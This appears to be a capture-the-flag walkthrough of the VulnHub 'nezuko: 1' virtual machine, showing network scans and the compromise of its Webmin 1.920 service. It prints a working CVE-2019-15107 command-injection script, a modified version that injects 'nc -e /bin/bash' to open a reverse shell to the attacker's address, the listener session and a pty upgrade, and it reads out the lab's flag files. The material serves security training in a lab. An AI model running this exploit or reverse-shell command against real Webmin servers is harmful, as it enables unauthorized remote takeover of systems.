NEZUKO: 1——202201152003

news2024/11/13 12:34:46

NEZUKO: 1——202201152003

About Release

Back to the Top

  • Name: nezuko: 1
  • Date release: 21 Aug 2019
  • Author: yunaranyancat
  • Series: nezuko

Download

Back to the Top

Please remember that VulnHub is a free community resource so we are unable to check the machines that are provided to us. Before you download, please read our FAQs sections dealing with the dangers of running unknown VMs and our suggestions for “protecting yourself and your network. If you understand the risks, please download!

  • nezuko.zip (Size: 2.9 GB)
  • Download: https://drive.google.com/open?id=1fsi4WvQnvYdpHaRMfNufyGiDKckmza_Z
  • Download (Mirror): https://download.vulnhub.com/nezuko/nezuko.zip

Description

Back to the Top

Creator : @yunaranyancat (Twitter)

Difficulty : Easy ~ Intermediate

OS Used: Ubuntu 18.04

Services : Webmin 1.920, Apache, SSH

User : root, zenitsu, nezuko

Hashes : at their home directory

File Information

Back to the Top

  • Filename: nezuko.zip
  • File size: 2.9 GB
  • MD5: 10DBD333208D012E620242276BE2F817
  • SHA1: 7D545A6F86532EC17157104F1952364A6AEDE2A5

Virtual Machine

Back to the Top

  • Format: Virtual Machine (Virtualbox - OVA)
  • Operating System: Linux

Networking

Back to the Top

  • DHCP service: Enabled
  • IP address: Automatically assign

Screenshots

Back to the Top

nezuko 1 screenshot

nezuko 1 screenshot

Walkthrough

Back to the Top

  • 21 Aug 2019 - VM Nezuko Boot2Root Writeup (yunaranyancat)

Submit Yours

1.信息收集

Currently scanning: 172.16.91.0/16   |   Screen View: Unique Hosts               
                                                                                  
 9 Captured ARP Req/Rep packets, from 5 hosts.   Total size: 540                  
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
 -----------------------------------------------------------------------------
 192.168.2.199   00:0c:29:18:22:fe      1      60  VMware, Inc.                   
 192.168.219.1   f2:18:98:21:29:69      2     120  Unknown vendor                 
 192.168.219.180 00:0c:29:18:22:fe      2     120  VMware, Inc.                   
 192.168.219.254 00:50:56:fb:8b:50      2     120  VMware, Inc.                   
 192.168.219.2   00:50:56:f1:66:62      2     120  VMware, Inc.                   

                                                                                   
┌──(pinginglab㉿pinginglab)-[~]
└─$ sudo netdiscover -i eth0

image-20230115200742662

lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        inet6 ::1  prefixlen 128  scopeid 0x10<host>
        loop  txqueuelen 1000  (Local Loopback)
        RX packets 8646  bytes 1926100 (1.8 MiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 8646  bytes 1926100 (1.8 MiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

                                                                                   
┌──(pinginglab㉿pinginglab)-[~]
└─$ nmap -A 192.168.219.0/24 -T 4                   
Starting Nmap 7.92 ( https://nmap.org ) at 2023-01-15 20:06 CST
Nmap scan report for 192.168.219.1 (192.168.219.1)
Host is up (0.0017s latency).
All 1000 scanned ports on 192.168.219.1 (192.168.219.1) are in ignored states.
Not shown: 1000 closed tcp ports (conn-refused)

Nmap scan report for 192.168.219.2 (192.168.219.2)
Host is up (0.0014s latency).
All 1000 scanned ports on 192.168.219.2 (192.168.219.2) are in ignored states.
Not shown: 1000 closed tcp ports (conn-refused)

Nmap scan report for 192.168.219.177 (192.168.219.177)
Host is up (0.0013s latency).
Not shown: 999 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 9.0p1 Debian 1 (protocol 2.0)
| ssh-hostkey: 
|   256 8c:8c:6e:2c:b9:f6:97:3c:5b:fc:30:eb:c5:29:0e:38 (ECDSA)
|_  256 ba:37:56:6d:cc:b1:a3:92:3a:09:c9:fb:9f:86:3e:39 (ED25519)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Nmap scan report for 192.168.219.180 (192.168.219.180)
Host is up (0.0019s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 4b:f5:b3:ff:35:a8:c8:24:42:66:64:a4:4b:da:b0:16 (RSA)
|   256 2e:0d:6d:5b:dc:fe:25:cb:1b:a7:a0:93:20:3a:32:04 (ECDSA)
|_  256 bc:28:8b:e4:9e:8d:4c:c6:42:ab:0b:64:ea:8f:60:41 (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-title: Welcome to my site! - nezuko kamado
|_http-server-header: Apache/2.4.29 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 256 IP addresses (4 hosts up) scanned in 9.58 seconds
                                                                                   
┌──(pinginglab㉿pinginglab)-[~]
└─$ 

┌──(pinginglab㉿pinginglab)-[~]
└─$ nmap -p- -A 192.168.219.180                                                   
Starting Nmap 7.92 ( https://nmap.org ) at 2023-01-15 20:10 CST
Nmap scan report for 192.168.219.180 (192.168.219.180)
Host is up (0.00098s latency).
Not shown: 65532 closed tcp ports (conn-refused)
PORT      STATE SERVICE  VERSION
22/tcp    open  ssh      OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 4b:f5:b3:ff:35:a8:c8:24:42:66:64:a4:4b:da:b0:16 (RSA)
|   256 2e:0d:6d:5b:dc:fe:25:cb:1b:a7:a0:93:20:3a:32:04 (ECDSA)
|_  256 bc:28:8b:e4:9e:8d:4c:c6:42:ab:0b:64:ea:8f:60:41 (ED25519)
80/tcp    open  http     Apache httpd 2.4.29 ((Ubuntu))
|_http-title: Welcome to my site! - nezuko kamado
|_http-server-header: Apache/2.4.29 (Ubuntu)
13337/tcp open  ssl/http MiniServ 1.920 (Webmin httpd)
|_http-title: Login to Webmin
| http-robots.txt: 1 disallowed entry 
|_/
| ssl-cert: Subject: commonName=*/organizationName=Webmin Webserver on ubuntu
| Not valid before: 2019-08-20T09:28:46
|_Not valid after:  2024-08-18T09:28:46
|_ssl-date: TLS randomness does not represent time
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 43.21 seconds
                                                                                   
┌──(pinginglab㉿pinginglab)-[~]
└─$ 

image-20230115201333944

image-20230115201505149

image-20230115201649135

image-20230115202312994

image-20230115202758930

2.try shellcode

#!/bin/sh
#
# CVE-2019-15107 Webmin Unauhenticated Remote Command Execution
# based on Metasploit module https://www.exploit-db.com/exploits/47230
# Original advisory: https://pentest.com.tr/exploits/DEFCON-Webmin-1920-Unauthenticated-Remote-Command-Execution.html
# Alternative advisory (spanish): https://blog.nivel4.com/noticias/vulnerabilidad-de-ejecucion-de-comandos-remotos-en-webmin
#
# Fernando A. Lagos B. (Zerial)
# https://blog.zerial.org
# https://blog.nivel4.com
#
# The script sends a flag by a echo command then grep it. If match, target is vulnerable.
#
# Usage: sh CVE-2019-15107.sh https://target:port
# Example: sh CVE-2019-15107.sh https://localhost:10000
# output: Testing for RCE (CVE-2019-15107) on https://localhost:10000: VULNERABLE!
#

FLAG="f3a0c13c3765137bcde68572707ae5c0"
URI=$1;

echo -n "Testing for RCE (CVE-2019-15107) on $URI: ";
curl -ks $URI'/password_change.cgi' -d 'user=wheel&pam=&expired=2&old=id|echo '$FLAG'&new1=wheel&new2=wheel' -H 'Cookie: redirect=1; testing=1; sid=x; sessiontest=1;' -H "Content-Type: application/x-www-form-urlencoded" -H 'Referer: '$URI'/session_login.cgi'|grep $FLAG>/dev/null 2>&1

if [ $? -eq 0 ];
then
	echo '\033[0;31mVULNERABLE!\033[0m'
else
	echo '\033[0;32mOK! (target is not vulnerable)\033[0m'
fi
#EOF
            
            

image-20230115203445800

                                                                               
┌──(pinginglab㉿pinginglab)-[~/vulnhub/nezuko]
└─$ sh shell1.sh https://192.168.219.180:13337 
test
https://192.168.219.180:13337
Testing for RCE (CVE-2019-15107) on https://192.168.219.180:13337: VULNERABLE!
                                                                                   
┌──(pinginglab㉿pinginglab)-[~/vulnhub/nezuko]
└─$ 

image-20230115203957511

nc -e /bin/bash attack_ip port 作者:合天网安实验室 https://www.bilibili.com/read/cv3530863/ 出处:bilibili

nc -e /bin/bash 192.168.219.177 4444

image-20230115204228848

image-20230115204355244

echo -n "Testing for RCE (CVE-2019-15107) on $URI: ";
curl -ks $URI'/password_change.cgi' -d 'user=wheel&pam=&expired=2&old=id|nc -e /bin/bash 192.168.219.177 4444&new1=wheel&new2=wheel' -H 'Cookie: redirect=1; testing=1; sid=x; sessiontest=1;' -H "Content-Type: application/x-www-form-urlencoded" -H 'Referer: '$URI'/session_login.cgi'|grep $FLAG>/dev/null 2>&1

┌──(pinginglab㉿pinginglab)-[~]
└─$ nc -lnvp 4444             
listening on [any] 4444 ...
connect to [192.168.219.177] from (UNKNOWN) [192.168.219.180] 51698

ls
Authen-SolarisRBAC-0.1
CHANGELOG
acl-lib.pl

id
uid=1000(nezuko) gid=1000(nezuko) groups=1000(nezuko),4(adm),24(cdrom),30(dip),46(plugdev),116(lpadmin),126(sambashare)

                                       
python -c 'import pty;pty.spawn("/bin/bash")' 

id
uid=1000(nezuko) gid=1000(nezuko) groups=1000(nezuko),4(adm),24(cdrom),30(dip),46(plugdev),116(lpadmin),126(sambashare)
pwd
/usr/local/webmin/acl
ls -l
total 736
pwd
/home/nezuko
tail nezuko.txt

from_zenitsu
nezuko.txt

,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,


1af0941e0c4bd4564932184d47dd8bef

cat nezuko.txt
Congratulations! You have found nezuko! Now, try to surpass your limit! Right here, right now...                                                                                                                                                                                                 ....
                                                                                                                                                                                                     
                                                                                                                                                                                                     
                                                                                                                                                                                                     
                                                                                                                                                                                                     
                                                                                                                                                                                                 ... 
                                                                                                                                                                                                 ....
                                                                                                                                                                                                 ....
                                                                                                                                                                                                 ....
                                                                                                                                                                                                 ....
                                                                                                                                                                                                 ....
                                                                                                                                                                                                 ....
                                                                                                                                                                                                 ....
                                                           .,,,,,,,..                                                                                                                            ....
.  ...................................,,,,,,,,,.,,,,,,,,,,,.......,...                                                                                                                           ....
 ,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,...,.                                                                                                                             ....
 ,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,...,.                                              .......................                                                        ....
 ,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,                  .,........,...,....................................                                                        ....
 ,,,,.,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,                  ...........           .........................,...                                                        ....
 .,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,                  ...            .                ........,......,...                                                        ....
 .,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,                                         ..     ...  ...,,....,..,...  ...                                                   ....
 .,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,                                     ..  ....     ..... ..,,.....,...  ...            .                                      ....
 .,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,                                   . . ... .. .     ....  .......,...            ...  .                                          
 .,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,                             . .   .                 ..  .  ...,*,,,.      ............                                          
 .,,,,,,,,,,,,,,,,,,,,,,,,,.,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,                             ..    */*/(/*,..      .... ..   ..*/((/,. .................                                         
 ..,,,,,,,,,,,,,,,,,,,,,,,,.,,,,,,.,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,                           ..  .,*((((((((((((((/*,. .. ..   ..*/((/.. .................                                         
  .,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,.,,,,,,,,,,,,,,                      .  .   .,/(((((((((((((((((((((,... .. ..*/(/*..,(, ..............                                         
  .,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,                    .      .,*/((((((((((((((((((((((((, . ....,**..,((/, ...............                                        
  .,,,,,,,,,,,,..,,,,,,,,,,,,,..,,,,,,,,,,,,,,,.,,,,,,,,,,,,.,,,,,,..                     .   .*/((((((((((((((((((((((((((((/  ,/,,,./(((((, ...............                                        
   ............................................................((*,..                   .  .  *(((((((((((((((((((((((((((((((///,,,,(((((/..................                                        
   ...............................................................,..               .        ,(((((((((((//(((((((((((((((((((/,.,,,,*(/,  ..................                                        
   ......................................................... .....,..                 .. .  ,/(((((/*,,**/(((((((((((((((((*  ...,..,....................                                        
   ...............................................................,..                       /((///((((((((((((((((((((((((/,/(#/ ....,..,....................                                        
    ...........................................................  .,..                      .((((((((((/****/(((((((((((((((#(/(/ . ..,..,....................                                        
    ...........................................................#/,,..              .    . .,((((((((/**/((/,/(((((((((*,*((((((/ ....,..,....................                                        
    ..............................................................,..              ...    ,/((/**..*///*..*#(((((((((/(((((((#(* ....,..,....................                                        
    ..............................................................,.               .    . ,/((/*/(((/(((#/*(((((((((/*..,**,(#/. ....,..,....................                                        
   .,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,.             ..    . /((((,.,///##(((((((((//#(/(((,/.  .,.,,..,....................                                        
   .,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,.,,,,,,,,,,,,,,,,,,,,.                     */(((,**(/(#(((((((((#(((/.((#(*  .,,..,..,....................                            ............
   .,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,.             .      .,*((((//(((((###(#(((((((#((/*/((#*.  .,,,,,..,....................                            ............
   .,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,.              .  .. ,*,*/(((/*,*,/##(((##(##//#(((((###.  ..,,,,,.,,....................                            ............
    ,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,.             ..  .  ,....,*,,,*,,,.,,*(((((((*,,(#*   ..,,,,,.,,....................                          ..............
    ,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,.              ....    ....//,*/******,*********,**,*,,,,,,,,*,.,,.,,....................                          ..............
    .,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,.              ....  ... ..,*,,/****(//(((((*/*//*/*,,.,,....................                          ..............
    .,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,.             ... . ... ...**,,******,****************,******,**,,,,,....................                            ............
    ..,,,.,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,.             .. . ,, ....... ...............,,,,,,,,,,******,*,,,,,,.................... .                          ............
     .,,,.,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,.             .... ,*, ....  ............................... ...,,,,,....................                            ............
     .,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,.,,,,,,,,,,,,,,,,.             ...  .,*,,,,,,*,,,,,,..,,,,,,,,.    .  ..........,,,,,,....................                            ............
     .,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,.             ..    .***,**********,,*****,.        .     . ....,,,,,....................                            ............
      .......................................................,,,,*,..            . .     ,****,*******,,*,.             .       .....,.,,....................                            ............
        ...................................................... /*.,..            ..       *****,*******,**,   ....     ..,.     .  ..,,,,....................                            ............
        .......................................................,..,..          ..         ,*****,*******,*,. ......    ..,,.    ... .,,,,....................                            ............
        ..........................................................,..             .....    .*****,****,,,**.........   ..,,,. ..... .,,,,....................                            ............
        ..........................................................,..          ........     ,*****,****,,(#,.........   ,,,,. ..... .,,,,....................                            ............
         .........................................................,..      ............     .,/********####*.........   .,,,.........,,,,....................                            ............
         ......................................................#/,,..     ..............    ..(#(/**/*####(*,,.......    .,.....,....,,,,....................                            ............
          ........................................................*,.     ..............    ..,#####((####//*..... ..    ... .,,,,.,,,,,,....................                            ............
          ...........................................................     ...............   ...#####(####/*(,....  ..    ...,,,,,,,,,,,,,....................                            ............
          .,,,,,,,,,,,,,,,,,,,.,,,,,,,,,,,,,,,,,,,,,,,,,,,,,.,,,,,,,.     ...............   ...(###(####(//(,....  ...   ...,,,,,,,,,,,,,....................                            ............
           ,.,,,,,.,,,,,,,,,,,.,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,.     ................  ..,*(#(###%(*//(...    ...  ...,,,,,,,,,,,,,,....................                            ............
           ..,,,,,.,,,,,,,,,,,.,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,.     ................ ...,/*(#####*/((*...   ....  ...,,,,,,,,,,,,,,....................                            ............
           ..,,,,,.,,,,,.,,,,,.,,,,,,,,,,,,,,,,.,,,,,,,,,,,,,,,,,,,,.     ................ ...,//####%*///(*..   ........,,,,,,,,,,,,,,,,....................                            ............
            .,,,,,,,,,,,.,,,,,.,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,.     ....................//(//#%#*/(//...  .........,,,,,,,,,,,,,,,,....................                            ............
             .,,,,,,,,,,,,,,,,.,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,.     ...................*/(///((//((/*..  .........,,,,,,,,,,,,,,,,,....................                            ............
             .,,,,,,,,,,,,,,,,.,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,.     ..................,*///******,,,..  ..........,,,,,,,,,,,,,,,,,....................                            ............
              .,,,,,,,,,.,,,.,.,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,.     ................ .,,...,,,,,,,,...  ........ .,,,,,,,,,,,,,,,,,....................                            ............
              ..,,,,,,,,.,,..,.,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,.     ..................,,,,,,,,,,,,,  . ........ ..,,,,,,,,,,,,,,,,,....................                            ............
                ,,,,,,,,.,,,.,.,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,.     ..........................      .......... ...,,,,,,,,,,,,,,,.,....................                            ............
                .,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,.     .................,****/*.      .......... ....,,,,,,,,,,,,,,,.,....................                            ............
                 .,,,,,,,,,,.,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,     ..................***,.        .......... ....,,,,,,,,,,,,,,,.,....................                            ............
                 ........................,,,,,,,,,,,,,,,,,,,,,,,,,,..     ...................           .........  ........,,,,,,,,,,,,.,....................                            ............
                   ............................................,*,,,.        ..............            .........   .........,,,,,,,,,,,.,....................                            ............
                    ...........................................,,.,,.             .......             .. .....    ..........,,,,,,,,,,,.,....................                            ............
                     .............................................,,.                                 .          ..........,,,,,,,,,,,,.,....................                            ............
                      ............................................,,.                     ....,,,..  .           ..........,,,.,.,,,,,,.,....................                            ............
                       ...........................................,,.                       .,(*,.          .........  ,,,,,.,,,,,,.,....................                            ............
                        ...................................... //,,,.     .............    ....*/(//(/        ..........    ,,.,.,,,,,,.,....................                            ............
                        .......................................,,.,*.      .....................,(/.,//      ..........     ...,.,,,,,,.,...................                             ............
                        .,,........................................,.       ...................,**//,        .....      .....,,,,,,.,...................                            .............
                         .,,,,..,,,,,,,,,,,,,,,.,,,,,,,,,,,,,,,,,,,,.       ...................,/((/*                   .....,,,,,,.,...................                            .............
                           ,,,..,,,,,,,,,.,,,,,.,,,.,,,,,,,,,,,,,,,,.         ................ ,/(/(//(,    .......        ......,,,,,,.,...................                            .............
                           ..,..,,,,,,.,..,,,,,.,,,.,,,,,,,,,,,,,,,,.             ..........   ./(/(*,,.    .....................,,,,,,.,..................                              ............
                             ...,,,,,,....,,,,,.,,,.,,,,,,,,,,,,,,,,.                 ....     .,,,,,,,       ................  ..,,,,,.,.   ................                                        
                              ..,,.,,,..,,,,,,,.,,,.,,,,,,,,,,,,,,,,.                           ...,,,        ..............    ...,,,,.,.                                                           
                               .,,.,,,..,,,,,,,.,,,..,,,,,,,,,,,,,,,.                           .,,,.             ...       ......,,,,,.,.                                                           
                                ...,,,,,,,,,,,,.,,,..,,,,,,,,,,,,,,,.               ................                ...........  .,,,,,.,.                                                           
                                  .,.,,,,,,,,,,.,,,,,,.,..,,.,,,,,,,.           ...............                .........    .......,,,,.,.                                                           
                                   ..,,,,,,,,,,.,,,..,.,..,,,,,,,,,,.                                                   ...........,,,,.,.                                                           
                                     .,,,,,,,,,.,,,,,,.,..,,,,,,,,,.,                  ................            ........      ....................................................................
                                      ..,,,,,,,.,,,,,,.,,,,,,,,,,,,.,             .......................                ..,*/(/,....................................................................
                                        .,,,,,,.,,,,,,,,,,,,,,,,,,,.,         .................,,,**/*..              .,*,*((/((/*...................................................................
                                          ...........................               ......  ..*//(##/*. ..  ...........................,.,...........................................................
                                             .......................                      .,*/#(//*(/(/....,,,,.........,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,.....,,..,,,,,,,,,,,...,,,........
                                                ..  ................      ..................,....,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,...
..........................................................................,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,
..............................,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,
..........................,,,..,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,
..........................,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,


1af0941e0c4bd4564932184d47dd8bef



cd from_zenitsu
ls
new_message_15-01-2023_17:05
new_message_15-01-2023_20:05
new_message_15-01-2023_20:10
new_message_15-01-2023_20:15
new_message_15-01-2023_20:20
new_message_15-01-2023_20:25
new_message_15-01-2023_20:30
new_message_15-01-2023_20:35
new_message_15-01-2023_20:40
new_message_15-01-2023_20:45
new_message_21-08-2019_01:13
new_message_21-08-2019_09:11
new_message_21-08-2019_09:12
new_message_21-08-2019_09:13
new_message_21-08-2019_09:40
cat new*
nezuko chan, would you like to go on a date with me? 
nezuko chan, would you like to go on a date with me? 
nezuko chan, would you like to go on a date with me? 
nezuko chan, would you like to go on a date with me? 
nezuko chan, would you like to go on a date with me? 
nezuko chan, would you like to go on a date with me? 
nezuko chan, would you like to go on a date with me? 
nezuko chan, would you like to go on a date with me? 
nezuko chan, would you like to go on a date with me? 
nezuko chan, would you like to go on a date with me? 



ls
nezuko
zenitsu
cd zenitus
cd zenitsu
ls
to_nezuko
zenitsu.txt
cat zenitsu.txt
Kaminari no kokyū, Ichi no kata...., Hekireki Issen!

                                                                                                                                                                                                                                                                                                                              
                                                                                                                                                               
                                                                                                                                                                                                                                                                                                                            
                                                                                                                                                               
                       ............,,,,,,,,,,,,****************/***************,,,,,,,,,,,.........                                
                 .............,,,,,,,,*********((((((((((((((((((((((((((((((((((((///********,,,,,,,,.............                        
                 ............,,,,,,,,,*********((((((((((((((((((((((((((((((((((((//*********,,,,,,,,............                         
                 ............,,,,,,,,,**********(((((((((((((((((((((((((((((((//*********,,,,,,,,...........     .                    
                .............,,,,,,,,,*******,****///(((((((((((((((((((((((((((((//(##/**********,,,,,,,,..........    ...                    
                 ..........,,,,,,,,,,,*****,*,*****///((/(((((((((((((((((((((///(/(######***********,,,,,,,,,....................                 
                   ...............,,,,,,,,,,,,*********//####%%##*******,,,,,,,,,,,........................                
                     ..............,,,,,,,,,,,,,,***************///(@%#%(//#####@#******,,,,,,,,,,,,..........................               
                .............,,,,,,,,,,,,**,,,*********/(/(###%###///##########(/*********,,,,,,,,,,,,......................               
                .............,,,,,,,,,,,,,,,,,**********((((((%#%###%(%########//*********,,,,,,,,,,,.......................               
               ...............,,,,,,,,,,,,,,,,**********//(#%%%%##(((#######(###%###(**********,,,,,,,,,,,........................               
               ................,,,,,,,,,,,,,,,**********///#%&&&&&%%(##(##((####(((%####/**********,,,,,,,,,,,........................               
                ...............,,,,,,,,,,,,,,,**********//#&%&&&&&&&&@@%/##((/(####%%#/(###(((*********,,,,,,,,,,,,,........................               
                 ..............,,,,,,,,,,,,,,,**********///%&&&%&&&&&&&&&&&%/##//(###((##(//(#(((**********,,,,,,,,,,,,,,.......................               
                 ...............,,,,,,,,,,,,,,**********/%&%%&%&&&@@&&&&&&&%//#%####(((#((//&@((**********,,,,,,,,,,,,,.........................               
                 ...............,,,,,,,,,,/((/*//#/****/%%%&&&%#(%&&&&&%&&*(##(((%((((#((/**********,,,,,,,,,,,,..........................               
                  ...............,,,,,,,,*%%#(((((**%%%%%%%%%%&%(%&&&&%%#(#((((((%&((//(*********,,,,,,,,,**/*................... ........               
                   ...............,,,,,*&&&&&%%(((((((%%%%%%%%%%%%%%#&%%%%((##((((((*//*********,*/(#%%&&&&&&%%#,...........................               
                   ................,,,*%%%#%&&((((/(/*#%%%(//(###(*#(#(*(((#((*,//******/(%&&&&&&&%%#(*,,,,,..................... ........               
                      .............,,,##*/#%&&%%(((//(((,*,(%%%%%%%#//(%%///(//*,,*/#&&&&&&&%#(*,,,,,,,,,,,,,...................... ........               
                      ..............,,/#(%%&&&&%((/%%*(**,,*/%%%%%%%%//(###(/((&&&&&&%(*,,,,,,,,,,,,,,,,,,,,.......................   .....                
                        .............,(/#/*(%%%#((*%%%%%//,,,,,,,,*,,#,#(,#&&&%&/#%#*,........,,,,,,,,,,,,,,........................... ......                 
                         .............//##%%%%%((/*/%%#(//(//,,,,/%(%%##%%%%//,.......,,,,.....,,,,,,,,,.................. .......... ....                   
                         ..............(#/##(#(//**/(/*/**//,,,(/#%(#%%%*%(#/,......,,,,,,,,,,........,..................... .......... ....                   
                          ..............,#####/(/(//#/*,/(##(%#///*,,..........,,,,,,,,,,,,,.......,.................... ..........  ...                   
                           ..............*##((/,**..(*,//(,..............,,..,,,,,,,,,,,,,,,.......................  ..........  ..                    
                             .............,*...*/%(#/*....................,,,..,,,..,,,,,,,,,,,,,,,,..................   .....                             
                              ...............*/((/........,,,,...,,,,,,..,,,..,,,,,,,,,,,......,,,............                                     
                                ...........,//((*.....,,,,,,...............,,.....,,...........,*(#...........                                     
                                ............///#///...............................,............,.,***#((,.........                                     
                                  ...........,///*///*...........................................,..,****#(((///,......                                    
                                ...............,//*/#(//*,..........,/,*/..........................,...,/,..,#//#,.....                                    
                                ..................*/***..........,***((((,...............................,,,(*,,,//*//.... .                                   
                                     ..............................(/,....................................**,/*,,#,.(..                                    
                                          ........................,**///(/*...................................../....#*/.                                      
                                     ..............................*/*.,,*,........................................,,*/......                                  
                               ........ .........................**(#(,./(.,,,,.................................(,,..,*........                                
                           ..........  ........,.,,,,,,,,,,,,,,/*,**/*//*/*...................................,*,,,,*/..........                               
                      . ..........  ........,,.,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,....,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,.............                         
     , .              ........   . .........,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,......,,,,,,,,,,,,,,,,,,,,,,,,,...............                       
     ,. ,..           .....      ..........,,.,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,......,,,,,,,,,,,,,,,,,,,,,...............                       
     , ...,                    ............,.,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,........,,,,,,,,,,,,...................                       
      *,                     ..................,,.,.,..,.,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,.............,....................                         
                           .........................,....,,.,,,,,.,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,...............................                          
                              ............................,..,....,,,.,,,,,.,,,,,,,,.,,..,,,,...,,,,...............................                            
